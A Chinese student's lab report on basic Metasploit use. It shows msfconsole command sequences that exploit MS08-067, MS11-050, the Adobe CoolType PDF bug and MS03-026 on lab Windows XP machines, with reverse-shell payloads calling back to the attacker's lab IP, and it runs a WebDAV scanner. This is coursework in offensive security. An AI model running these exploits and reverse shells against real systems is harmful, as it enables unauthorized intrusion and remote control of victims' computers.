实验内容

本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:

  • 一个主动攻击实践,如ms08-067;

  • 一个针对浏览器的攻击,如ms11-050;

  • 一个针对客户端的攻击,如Adobe;

  • 成功应用任何一个辅助模块。

  • 以上四个小实践可不限于以上示例,并要求至少有一个是和其他所有同学不一样的。


主动攻击实践 MS08-067漏洞

  • msfconsole进入msf控制台
  • search ms08_067查看该漏洞

  • use exploit/windows/smb/ms08_067_netapi使用该漏洞

  • show payloads回链攻击载荷

  • set payload generic/shell_reverse_tcptcp反向回连

  • set LHOST 192.168.126.128攻击机的ip地址

  • set LPORT 5229 攻击的端口

  • set RHOST 192.168.126.136靶机的ip地址

  • set target 0 选择目标系统类型

  • exploit 进行攻击

  • 下图中展现了攻击成功

  • 在kali中输入ipconfig查看靶机的ip地址

  • 在XP中查看靶机的ip地址,两者相比较,完全一样。

针对浏览器的攻击 ms11_050

  • 进入msfconsole控制台

  • 输入use windows/browser/ms11_050_mshtml_cobjectelement命令使用ms11_050漏洞

  • 输入set payload windows/meterpreter/reverse_http命令使用http反向连接

  • 设置kali的IP地址set LHOST 192.168.126.128

  • 设置端口set LPORT 5229

  • 设置资源标识符路径set URIPATH fyh5229

  • 进行攻击exploit



将上图的LOCAL IP 的网址输入进WIN XP中的IE浏览器中,出现遇到问题需要关闭的窗口。同时360已经给出需要修复的通知。

  • 但是回到KALI建立会话时,IE浏览器已经关闭该网页。

  • 设置浏览器的选项,将安全等级设为最低,且启动了插件设置,但是,会话连接还是失败。。。

会接着研究这个问题的

针对客户端的攻击 Adobe

  • 输入msfconsole进入msf控制台

  • 输入search adobe查找和adobe相关的漏洞

  • 我选择了 windows/fileformat/adobe_cooltype_sing

  • 输入set payload windows/meterpreter/reverse_tcp使用tcp反向连接

  • 设置IP地址及端口号

  • 输入set FILENAME 5229.pdf命令生成pdf文件

  • 进行攻击

  • 下图为成功生成PDF文件的标志。

  • 根据存储路径,找到PDF文件并将其放进靶机里。
  • 但我找了很久都没有找到该文件,后来,如下图,选择显示隐藏文件,这时就能找到隐藏的文件夹了。

  • 我先将改文件复制进了我的主机中,立马被360删除了。

  • 在msf中进入监听模式
  • set payload windows/meterpreter/reverse_tcptcp反向连接
  • 设置ip地址和端口号
  • 进行攻击

  • 在XP上打开5229.pdf文件,kali中显示攻击成功

  • 输入ipconfig,显示的是xp的ip地址,证明攻击正确。


辅助模块 webdav

webdav: WebDAV 一种基于 HTTP 1.1协议的通信协议。由于 WebDAV 已与 Windows XP 和 IIS 集成,因此它具有这两者所提供的安全特性。其中包括 Internet 信息服务管理单元中指定的 IIS 权限和 NTFS 文件系统中的自由选择访问控制列表 (DACL)。

  • 进入msf控制台
  • 使用show auxiliary命令显示所有的辅助模块以及他们的用途。

  • 选择scanner/http/webdav_scanner
  • show options查看该漏洞的配置选项

  • 设置了kali的ip地址和线程
  • 进行攻击

  • 允许webdav,再次进行攻击,会得到[*] 192.168.126.128 (Microsoft-IIS/6.0) has WEBDAV ENABLED 的消息。

RPC接口长主机名远程缓冲区溢出漏洞(MS03-026)

  • Remote Procedure Call (RPC)是Windows操作系统使用的一种远程过程调用协议,RPC提供进程间交互通信机制,允许在某台计算机上运行的程序无缝地在远程系统上执行代码。

  • 使用use exploit/windows/dcerpc/ms03_026_dcom

  • 使用set payload windows/shell_bind_tcptcp反向连接

  • show options 查看该漏洞的配置选项

  • set LHOST 192.168.126.128 设置主机ip

  • set RHOST 192.168.126.137 设置反弹shell的ip

  • 进行攻击,攻击成功,但是没办法建立会话。

"无会话已创建"消息发生的情况: ① 使用的漏洞利用对所选择的目标不起作用。可以
是一个不同版本的漏洞,或目标配置有问题。 ② 您使用的漏洞利用被配置为使用不创建的有效载荷
互动会话。

实验后问题回答

  • 用自己的话解释什么是exploit,payload,encode.

  • exploit英文翻译为利用,黑客就是利用漏洞对电脑进行攻击,有漏洞不一定可以利用,但可以利用的一定有漏洞。

  • payload:有效载荷。通常在传输数据时,为了使数据传输更可靠,要把原始数据分批传输,并且在每一批数据的头和尾都加上一定的辅助信息,而其中的原始数据就是payload

  • encode:编码器,用来给payload进行编码,保护payload不被发现


实验总结与体会

这次实验其实不难,但是不代表每次攻击都能成功,也不代表每次攻击都能成功建立会话,我做了好几个实验,成功的占少数,还有些失败的我没写上来。

虽然失败的占多数,但无疑这次实验通过自己查找资料学习漏洞学到了很多知识。

20155229《网络对抗技术》Exp5:MSF基础应用的更多相关文章

  1. 2018-2019-2 20165205 《网络对抗》 Exp5 MSF基础

    2018-2019-2 20165205 <网络对抗> Exp5 MSF基础 实验内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1 ...

  2. 20155227《网络对抗》Exp5 MSF基础应用

    20155227<网络对抗>Exp5 MSF基础应用 基础问题回答 用自己的话解释什么是exploit,payload,encode exploit:把实现设置好的东西送到要攻击的主机里. ...

  3. 20155232《网络对抗》Exp5 MSF基础应用

    20155232<网络对抗>Exp5 MSF基础应用 基础问题回答 用自己的话解释什么是exploit,payload,encode. exploit:就是利用可能存在的漏洞对目标进行攻击 ...

  4. 20155302《网络对抗》Exp5 MSF基础应用

    20155302<网络对抗>Exp5 MSF基础应用 实验内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1.1一个主动攻击实践,如 ...

  5. 20155323刘威良《网络对抗》Exp5 MSF基础应用

    20155323刘威良<网络对抗>Exp5 MSF基础应用 实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1.1一个主动攻击实 ...

  6. 20145301 赵嘉鑫 《网络对抗》Exp5 MSF基础应用

    20145301 赵嘉鑫 <网络对抗>Exp5 MSF基础应用 一 实验链接 渗透实验一:MS08_067渗透实验 渗透实验二:MS14_064渗透实验  (首用) 渗透实验三:Adobe ...

  7. 20145215《网络对抗》Exp5 MSF基础应用

    20145215<网络对抗>Exp5 MSF基础应用 基础问题回答 用自己的话解释什么是exploit,payload,encode? exploit就相当于是载具,将真正要负责攻击的代码 ...

  8. 20145208 蔡野 《网络对抗》Exp5 MSF基础应用

    20145208 蔡野 <网络对抗>Exp5 MSF基础应用 链接地址 主动攻击:利用ms08_067_netapi进行攻击 对浏览器攻击:MS10-002 对客户端攻击:adobe_to ...

  9. 20145311王亦徐 《网络对抗技术》 MSF基础应用

    20145311王亦徐 <网络对抗技术> MSF基础应用 实验内容 掌握metasploit的基本应用方式以及常用的三种攻击方式的思路 主动攻击,即对系统的攻击,不需要被攻击方配合,以ms ...

  10. 20145325张梓靖 《网络对抗技术》 MSF基础应用

    20145325张梓靖 <网络对抗技术> MSF基础应用 实验内容 掌握metasploit的基本应用方式以及常用的三种攻击方式的思路 主动攻击,即对系统的攻击,不需要被攻击方配合,这里以 ...

随机推荐

  1. 只有mdf文件的恢复方法

    EXEC sp_attach_single_file_db @dbname = 'AdventureWorksDW2012_Data',@physname = 'D:\Program Files (x ...

  2. 分享一个 jsPDF的简单使用以及中文编码问题的解决

    后台一个下载文件中内容国际化问题的坑甩到了前端 前端自己匹配,自己处理国际化,生成文件下载 jsPDF-AutoTable    挺靠谱 中文乱码, 还是好人多啊 解决方式如下文章 jsPDF的简单使 ...

  3. Mongodb的入门(6)副本集

    Mongodb的副本集:(有两种情况,主从复制,副本集) 这次我来说一下mongodb的副本集,副本集的出现可以有效的保证mongodb的单点问题,对数据的稳健性有一定辅助作用: MongoDB复制: ...

  4. CSS 小结笔记之伸缩布局 (flex)

    CSS flex 是一种伸缩布局,之前块级元素布局在同一行,可以通过display或position或float来实现,而本篇介绍一个新的方法——flex(弹性布局). flex 为和模型布局提供了极 ...

  5. ECMAScript5新特性总结

    虽然ECMAScript5早就成为标准推出来了,但之前因为一直用的是ECMAScript3,并且工作中总是要求兼容IE的低版本,所以用的比较少.如今市场上大多数浏览器都能兼容ECMAScript5(I ...

  6. 回归JavaScript基础(十)

    主题:创建对象 原型模式 JavaScript中的每个对象都有一个prototype属性(原型属性),这个属性是一个指针,指向一个对象,而这个对象可以由一些属性和方法组成.被指向的对象,可以是多个对象 ...

  7. mysql的几个知识点

    常用命令 原则:能用可视化工具的尽量使用工具,命令行仅限于问题排查. mysql -u ACCOUNT -pPWD -h IP -P port [-D database] //连接数据库 show d ...

  8. 无法获取链接服务器 "XXX" 的 OLE DB 访问接口 "SQLNCLI10" 的架构行集 "DBSCHEMA_TABLES_INFO"。该访问接口支持该接口,但使用该接口时返回了失败代码。

    1. SQL 2000 下载补丁 SQL2KSP4 ,进行安装 2.找到SQL2KSP4\install\instcat.sql 并在sql2000 中打开查询分析器中执行

  9. Python实例---模拟微信网页登录(day2)

    第三步: 实现长轮询访问服务器---day2代码 settings.py """ Django settings for weixin project. Generate ...

  10. 使用ubuntu过程中遇到的问题汇总

    使用ubuntu过程中遇到的问题汇总 1.使用图形界面设置免密码登录之后,改回密码登陆失效 解决方案: https://askubuntu.com/questions/211084/how-do-i- ...